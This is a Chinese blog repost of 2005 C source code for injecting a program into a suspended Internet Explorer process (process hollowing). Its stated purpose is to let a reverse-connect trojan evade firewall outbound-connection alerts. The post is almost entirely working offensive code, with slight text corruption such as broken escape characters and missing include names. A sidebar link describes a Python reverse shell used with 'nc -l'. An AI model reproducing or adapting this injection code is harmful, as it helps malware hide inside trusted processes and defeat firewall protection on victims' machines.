绕过防火墙的反向连接报警

最新推荐文章于 2019-07-04 18:35:27 发布
最新推荐文章于 2019-07-04 18:35:27 发布
阅读量1.2k 收藏 1
点赞数
分类专栏: windows底层核心編程 文章标签: 防火墙 null path header dos date
Author:  Polymorphours
Email:   Polymorphours@whitecell.org
Homepage:http://www.whitecell.org
Date:    2005-11-17

 
/*

	Author: Polymorphours
	
	Date: 2005/1/10

	另一种将自己代码注入傀儡进程的方法,配合反弹木马,可绕过防火墙的
         反向连接报警。

*/

#include 
      
       
#include 
      
       

//
// ntdll.lib ( 来自DDK 2000 )
//

#pragma comment(lib,"ntdll.lib") 

typedef long NTSTATUS; 

NTSYSAPI 
NTSTATUS 
NTAPI 
ZwUnmapViewOfSection( 
	HANDLE ProcessHandle, 
	PVOID BaseAddress 
	); 

typedef struct _ChildProcessInfo { 

	DWORD dwBaseAddress; 
	DWORD dwReserve; 
} CHILDPROCESS, *PCHILDPROCESS; 

BOOL 
FindIePath(
	char *IePath,
	int *dwBuffSize
	); 
	

BOOL InjectProcess(void); 


DWORD 
GetSelfImageSize(
	HMODULE hModule
	); 

BOOL 
CreateInjectProcess( 
	PPROCESS_INFORMATION pi, 
	PCONTEXT pThreadCxt, 
	CHILDPROCESS *pChildProcess 
	);


char szIePath[MAX_PATH];

int main(void) 
{ 
	if (InjectProcess() ) { 
		
		printf("This is my a test code,made by (Polymorphours)shadow3./r/n"); 
	} else { 
		
		MessageBox(NULL,"进程插入完成","Text",MB_OK); 
	} 

	return 0; 
} 

BOOL 
FindIePath(
	char *IePath,
	int *dwBuffSize
	) 
{ 
	char szSystemDir[MAX_PATH]; 
	
	GetSystemDirectory(szSystemDir,MAX_PATH); 
	
	szSystemDir[2] = '/0' 
	lstrcat(szSystemDir,"//Program Files//Internet Explorer//iexplore.exe"); 
	
	lstrcpy(IePath, szSystemDir); 
	return TRUE; 
} 


BOOL InjectProcess(void) 
{ 
	char 					szModulePath[MAX_PATH]; 
	DWORD 					dwImageSize = 0; 
	
	STARTUPINFO 			si = {0}; 
	PROCESS_INFORMATION 	pi; 
	CONTEXT 				ThreadCxt; 
	DWORD 					*PPEB; 
	DWORD 					dwWrite = 0; 
	CHILDPROCESS 			stChildProcess; 
	LPVOID 					lpVirtual = NULL; 
	PIMAGE_DOS_HEADER 		pDosheader = NULL; 
	PIMAGE_NT_HEADERS 		pVirPeHead = NULL; 
	
	HMODULE 				hModule = NULL; 
	
	ZeroMemory( szModulePath, MAX_PATH ); 
	ZeroMemory( szIePath, MAX_PATH ); 
	
	GetModuleFileName( NULL, szModulePath, MAX_PATH ); 
	FindIePath( szIePath, NULL ); 
	
	if ( lstrcmpiA( szIePath, szModulePath ) == 0 ) { 
		
		return FALSE; 
	} 
	
	hModule = GetModuleHandle( NULL ); 
	if ( hModule == NULL ) { 
		
		return FALSE; 
	} 
	
	pDosheader = (PIMAGE_DOS_HEADER)hModule; 
	pVirPeHead = (PIMAGE_NT_HEADERS)((DWORD)hModule + pDosheader->e_lfanew); 
	
	dwImageSize = GetSelfImageSize(hModule); 
	
	//
	// 以挂起模式启动一个傀儡进程,这里为了传透防火墙,使用IE进程
	//
	
	if ( CreateInjectProcess(
			&pi, 
			&ThreadCxt ,
			&stChildProcess
			) ) { 

		printf("CHILD PID: [%d]/r/n",pi.dwProcessId); 

		//
		// 卸载需要注入进程中的代码
		//
	
		if ( ZwUnmapViewOfSection( 
				pi.hProcess, 
				(LPVOID)stChildProcess.dwBaseAddress 
				) == 0 ) { 

			//
			// 重新分配内存
			//

			lpVirtual = VirtualAllocEx( 
							pi.hProcess, 
							(LPVOID)hModule, 
							dwImageSize, 
							MEM_RESERVE │ MEM_COMMIT, PAGE_EXECUTE_READWRITE 
							); 
	
			if ( lpVirtual ) { 

				printf("Unmapped and Allocated Mem Success./r/n"); 
			} 
	
		} else { 

			printf("ZwUnmapViewOfSection() failed./r/n"); 
			return TRUE; 
		} 
	
		if ( lpVirtual ) { 
	
			PPEB = (DWORD *)ThreadCxt.Ebx; 
		
			//
			// 重写装载地址 
			//
		
			WriteProcessMemory( 
				pi.hProcess, 
				&PPEB[2], 
				&lpVirtual, 
				sizeof(DWORD), 
				&dwWrite 
				); 
		
			//
			// 写入自己进程的代码到目标进程
			//
		
			if ( WriteProcessMemory( 
					pi.hProcess, 
					lpVirtual, 
					hModule, 
					dwImageSize, 
					&dwWrite) ) { 
	
				printf("image inject into process success./r/n"); 
		
				ThreadCxt.ContextFlags = CONTEXT_FULL; 
				if ( (DWORD)lpVirtual == stChildProcess.dwBaseAddress ) { 
		
					ThreadCxt.Eax = (DWORD)pVirPeHead->OptionalHeader.ImageBase + pVirPeHead->OptionalHeader.AddressOfEntryPoint; 
				} else { 
		
					ThreadCxt.Eax = (DWORD)lpVirtual + pVirPeHead->OptionalHeader.AddressOfEntryPoint; 
				} 
		
		#ifdef DEBUG 
				printf("EAX = [0x%08x]/r/n",ThreadCxt.Eax); 
				printf("EBX = [0x%08x]/r/n",ThreadCxt.Ebx); 
				printf("ECX = [0x%08x]/r/n",ThreadCxt.Ecx); 
				printf("EDX = [0x%08x]/r/n",ThreadCxt.Edx); 
				printf("EIP = [0x%08x]/r/n",ThreadCxt.Eip); 
		#endif 
		
				SetThreadContext(pi.hThread, &ThreadCxt); 
				ResumeThread(pi.hThread); 
		
			} else { 
	
				printf("WirteMemory Failed,code:%d/r/n",GetLastError()); 
				TerminateProcess(pi.hProcess, 0); 
			} 
		
		} else { 
	
			printf("VirtualMemory Failed,code:%d/r/n",GetLastError()); 
			TerminateProcess(pi.hProcess, 0); 
		} 
	} 
	
	return TRUE; 
} 

DWORD 
GetSelfImageSize(
	HMODULE hModule
	) 
{ 
	DWORD dwImageSize; 

	_asm 
	{ 
	mov ecx,0x30 
	mov eax, fs:[ecx] 
	mov eax, [eax + 0x0c] 
	mov esi, [eax + 0x0c] 
	add esi,0x20 
	lodsd 
	mov dwImageSize,eax 
	
	} 

	return dwImageSize; 
} 

BOOL 
CreateInjectProcess( 
	PPROCESS_INFORMATION pi, 
	PCONTEXT pThreadCxt, 
	CHILDPROCESS *pChildProcess 
	) 

{ 
	STARTUPINFO si = {0}; 
	
	DWORD 		*PPEB; 
	DWORD 		read; 

	// 使用挂起模式启动ie 

	if( CreateProcess( 
			NULL, 
			szIePath, 
			NULL, 
			NULL, 
			0, 
			CREATE_SUSPENDED, 
			NULL, 
			NULL, 
			&si, 
			pi 
			) ) { 

		pThreadCxt->ContextFlags = CONTEXT_FULL; 
		GetThreadContext(pi->hThread, pThreadCxt); 
		
		PPEB = (DWORD *)pThreadCxt->Ebx; 
		
		// 得到ie的装载基地址 
		ReadProcessMemory( 
			pi->hProcess, 
			&PPEB[2], 
			(LPVOID)&(pChildProcess->dwBaseAddress), 
			sizeof(DWORD), 
			&read 
			); 

		return TRUE ; 

	} 

	return FALSE; 
}
iiprogram
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
python反向连接shell,可穿透防火墙
07-30
python reverse_shell.py 反弹目的ip 3322 反弹目的ip 执行nc -l 3322 即可连结 被控端
将一个单向链表反向连接
11-28
将一个单向链表反向连接
学习Polymorphours的绕过防火墙反向连接报警代码,心得,它的思路
annhf的专栏
09-25 1126
       整个代码没有使用windows hook技术,而是利用将代码直接写入远程程序空间中。这个代码的运行过程是这样的,首先用CreateProcess来创建一个ie进程,创建时候就把它挂起。然后得到它的基址,通过这个基址使用函数ZwUnmapViewOfSection来卸载这个内存空间的数据,让这个空间的都为0。再用VirtualAllocEx来个ie进程重新分配内存空间,大小为本程序的大
学习Polymorphours的绕过防火墙反向连接报警代码
annhf的专栏
09-21 1551
/*Author: PolymorphoursDate: 2005/1/10另一种将自己代码注入傀儡进程的方法,配合反弹木马,可绕过防火墙的         反向连接报警。*/#include #include //// ntdll.lib ( 来自DDK 2000 )//#pragma comment(lib,"ntdll.lib") typedef long NTSTATUS; NTSYSAP
[转载]绕过防火墙反向连接报警
Nest of Nonsenser
12-12 896
信息来源:whitecell文章作者:Polymorphours----------------------------Author: PolymorphoursEmail:   Polymorphours@whitecell.orgHomepage:http://www.whitecell.org Date:   2005-11-17/*     Author: Polymorphours   
绕过杀毒软件之一(实时监控篇)续
老裴
06-21 2063
上次说的绕过杀毒软件之一(实时监控篇)中,提供了解决方法这是对应代码:(至于如何清理具体驱动的NotfiyRoutine,就是找到驱动所加载的地址,用PsLoadedModuleList或ZwQuerySystemInformation,然后判断PspLoadImageNotifyRoutine中的项是否落在此驱动范围,我在这就不罗嗦了,自己动手去)//FixNotify.h//Its for
利用Microsoft.com绕过防火墙以传递恶意命令
NOSEC2019的博客
07-04 1244
Microsoft.com可以说是互联网上最知名域名之一,旗下拥有数千个子域。在很多特定的时刻,Windows 10系统会对这些子域执行数百次ping操作,这就使得防火墙和其他安全软件很难实时确认这些请求的合法性。因此,攻击者可以使用这些子域来传递恶意软件以躲避防火墙。 最近,在社交媒体上分享一篇文章时,我发现Twitter会阻止我往tweet窗口中输入一个简单的PowerShell命令。Twi...
Internet防火墙技术及安全策略
程序人生
09-29 8764
Internet防火墙技术及安全策略摘要:    本文讨论了当前常见的各种防火墙技术的特点,及其适用范围;然后讨论了防火墙设置安全策略,及这些策略的优缺点。Internet防火墙 Internet防火墙技术 Internet防火墙的好处 Internet防火墙的限制 Internet黑客的工具箱 信息收集 安全弱点的探测系统 访问受保护系统
nginx反向代理时如何保持长连接
01-09
【保持和Client的长连接】 在HTTP 1.1中,长连接通过“Keep-Alive”头字段实现,允许...通过以上配置,可以有效地在Nginx反向代理中实现客户端到Nginx以及Nginx到后端服务器的长连接,从而提升系统性能和资源利用率。
反向连接木马测试源程序
06-26
本程序利用winsockAPI函数在vc下编程,监听对方主机某一指定端口,当对方主机尝试打开该端口即达到连接目的。不具有破坏性,只演示了winsock的使用,提供思路。
Oracle连接sqlserver与反向连接.doc
11-22
Oracle连接sqlserver与反向连接.doc
全国计算机三级(网络技术)做题技巧
07-22
全国计算机三级(网络技术)做题技巧
记录 cocos 开发问题 ,微信 wx.xxx函数 报找不到名称“wx”
07-22
wx api 文件
20231108-173536 时间箭贴板
07-22
时间粘贴小工具 启动后点击回车 可以得到时间字符串 直接粘贴可用
毕业设计javajsp西饼点心店收费系统(ssh)-qrp源码含文档工具包
07-22
毕业设计javajsp西饼点心店收费系统(ssh)-qrp源码含文档工具包 后台是ssh框架,页面是jsp,数据库mysql,jdk1.8,开发工具用ecplise、myecplise、sts、idea都可以 点心店管理系统是针对点心店内部而设计的,应用于点心店的局域网,这样可以使得点心店内部管理更有效的联系起来。系统的主要功能包括:供货商信息管理、点心信息管理、采购申请管理与物品采购管理。 包含:源码、数据库脚本、论文、开题报告、环境工具包、相同框架项目的安装教程(在说明文档中)
275、基于stm32的电压可调、电流智能检测系统设计(原理图、PCB图、源代码)
最新发布
07-22
275、基于stm32的电压可调、电流智能检测系统设计(原理图、PCB图、源代码) 功能:系统使用stm32单片机设计,USB 5V供电,实现3.3V——12V可调输出,电流测量范围1uA——500mA,液晶LCD12864显示,通过串口上传信息和串口修改输出电压;各功能如下: 1、使用stm32为核心,keil编程; 2、输出3.3V-12V可调电压; 3、输出电流显示在LCD12864上,输出电流检测范围是1uA——500mA; 4、串口同步上传电压和电流信息; 5、支持串口指令修改输出电压值;
C++《使用NeuroSky和摄像头实现的简易脑波控制的图片拍摄并且识别单词或图片中的植物》+源代码+文档说明
07-22
<项目介绍> - 使用NeuroSky和摄像头实现的简易脑波控制的图片拍摄并且识别单词或图片中的植物 - 不懂运行,下载完可以私聊问,可远程教学 该资源内项目源码是个人的毕设,代码都测试ok,都是运行成功后才上传资源,答辩评审平均分达到96分,放心下载使用! 1、该资源内项目代码都经过测试运行成功,功能ok的情况下才上传的,请放心下载使用! 2、本项目适合计算机相关专业(如计科、人工智能、通信工程、自动化、电子信息等)的在校学生、老师或者企业员工下载学习,也适合小白学习进阶,当然也可作为毕设项目、课程设计、作业、项目初期立项演示等。 3、如果基础还行,也可在此代码基础上进行修改,以实现其他功能,也可用于毕设、课设、作业等。 下载后请首先打开README.md文件(如有),仅供学习参考, 切勿用于商业用途。 --------
ABB字迹书写技术文档
07-22
内容概要:包含指导使用ABB机器人完成“毅”字在写字板上书写的技术文档。在执行过程中将提供更多可能错误、其他路径,并引导读者在此基础上完成微量调整。会介绍部分原理,使读者在学习后增进对ABB仿真功能的了解,例如:RAPID的使用、仿真中碰撞监控的设置等 适合人群:适合ABB RobotStudio6.18.01仿真软件初学者 应用场景:应用于汇博机器人教学工作台,可以引导未接触过相关领域的人群实现仿真软件的编写直至最终烧录 能学到什么:①ABB RobotStudio6.18.01使用技巧;②ABB机器人运行过程;3、烧录方法;4、ABB机器人运行的弊端 阅读建议:此资源以开发ABB RobotStudio6.18.01RAPID程序学习其原理和内核,不仅是代码编写实现也更注重内容上的需求分析和方案设计,所以在学习的过程要结合这些内容一起来实践,并调试对应的代码。
Web应用防火墙:安全防护与绕过策略
针对SQL注入,除了常见的"id=1||1=1"和"id=1&&1=1"类型的绕过,还有利用空格字符替换、HTTP参数污染等方法,使得攻击者能够巧妙地避开WAF的防护机制。 新兴的WAF云防护,如国外的Cloudflare和国内的网站宝、安全宝...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值